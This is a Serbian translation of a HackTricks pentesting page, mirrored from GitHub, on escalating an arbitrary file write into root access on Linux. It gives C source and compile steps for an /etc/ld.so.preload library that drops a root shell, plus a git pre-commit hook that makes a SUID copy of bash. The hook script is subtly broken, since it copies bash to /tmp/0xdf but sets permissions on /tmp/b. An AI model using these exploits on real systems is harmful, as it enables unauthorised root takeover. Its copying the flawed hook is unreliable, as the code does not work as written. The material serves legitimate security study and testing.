Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-27 07:01:09 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/linux-hardening/privilege-escalation/write-to-root.md
Translator workflow 6c06826974 Translated to Serbian
2024-02-10 13:11:20 +00:00

3.6 KiB
Raw Blame History

Proizvoljan zapis datoteke u root

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

/etc/ld.so.preload

Ova datoteka se ponaša kao LD_PRELOAD env promenljiva, ali takođe radi i u SUID binarnim fajlovima.
Ako je možete kreirati ili izmeniti, jednostavno možete dodati putanju do biblioteke koja će biti učitana sa svakim izvršenim binarnim fajlom.

Na primer: echo "/tmp/pe.so" > /etc/ld.so.preload

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
unlink("/etc/ld.so.preload");
setgid(0);
setuid(0);
system("/bin/bash");
}
//cd /tmp
//gcc -fPIC -shared -o pe.so pe.c -nostartfiles

Git kuke

Git kuke su skripte koje se izvršavaju pri različitim događajima u git repozitorijumu, kao što je kreiranje commit-a, spajanje... Dakle, ako privilegovani skript ili korisnik često izvršavaju ove akcije i mogu pisati u .git folder, to se može iskoristiti za privilegovanu eskalaciju.

Na primer, moguće je generisati skriptu u git repozitorijumu u .git/hooks folderu tako da se uvek izvršava kada se kreira novi commit:

{% code overflow="wrap" %}

echo -e '#!/bin/bash\n\ncp /bin/bash /tmp/0xdf\nchown root:root /tmp/0xdf\nchmod 4777 /tmp/b' > pre-commit
chmod +x pre-commit

{% endcode %}

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u: